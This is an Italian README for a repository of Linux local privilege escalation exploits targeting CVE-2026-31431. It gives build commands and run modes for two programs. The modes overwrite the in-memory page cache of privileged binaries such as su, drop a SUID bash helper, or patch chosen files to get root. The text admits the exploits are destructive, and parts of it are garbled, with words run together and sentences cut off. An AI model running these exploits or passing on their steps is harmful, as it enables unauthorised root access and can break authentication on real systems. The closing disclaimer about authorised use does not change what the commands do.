
# Exploit di escalation dei privilegi locali su Linux per CVE-2026-31431, inclusi flussi di lavoro grezzi e recuperabili.
Queste implementazioni di LPE per Linux sono distruttive a runtime.
Sovrascrivono la vista page-cache live di target privilegiati come:
supatchDi solito non si tratta di una modifica persistente normale su disco, ma cambia il comportamento a runtime e può influenzare immediatamente il flusso di autenticazione/privilegi.
Questo repository non fornisce una modalità root completamente non distruttiva.
copyfail_raw_su_root.ccopyfail_portable_lpe.cEntrambi sono solo per Linux.
Binari precompilati per architetture aggiuntive potrebbero essere aggiunti in aggiornamenti futuri.
gcc -O2 -s copyfail_portable_lpe.c -o copyfail_portable_lpe
gcc -O2 -s copyfail_raw_su_root.c -o copyfail_raw_su_root
Per copyfail_portable_lpe.c, eseguendo:
./copyfail_portable_lpe
viene usata la modalità auto-revert di default.
Ciò significa che proverà prima il flusso di lavoro recuperabile:
Se la modalità recuperabile fallisce, il programma stampa suggerimenti per le modalità di fallback.
Variante raw minima:
susu target./copyfail_raw_su_root
Variante generale con più modalità.
Modalità esplicita senza ripristino:
./copyfail_portable_lpe auto
Modalità recuperabile per prima:
./copyfail_portable_lpe
./copyfail_portable_lpe auto-revert
Rilascia un helper SUID bash senza ripristino:
./copyfail_portable_lpe helper ./.rootsh
Rilascia un helper, poi tenta di ripristinare i target modificati:
./copyfail_portable_lpe helper-revert ./.rootsh
Sostituzione di stringhe della stessa lunghezza su un file scelto:
./copyfail_portable_lpe patch <file> <find> <replace>
Percorso di patch su raw:
./copyfail_portable_lpe raw-su-elf
auto-revert e helper-revert sono comunque distruttive durante lo sfruttamento.
Sono "recuperabili" solo nel senso che:
Quindi si tratta di distruzione-poi-ripristino, non di un approccio realmente non distruttivo.
auto / auto-revert / helper / helper-revert / patch: orientate a Linux, meno strettamente legate all'architettura CPU quando compilate sul targetraw-su-elf: solo x86_64 LinuxQuesto repository è fornito per:
Non utilizzare questi materiali contro sistemi, account o reti senza esplicita autorizzazione del proprietario.
L'autore e i contributori forniscono questo contenuto così com'è, senza garanzia, e non accettano alcuna responsabilità per uso improprio, danni, perdita di dati, interruzione del servizio o conseguenze legali derivanti dall'uso del codice o delle tecniche presenti in questo repository.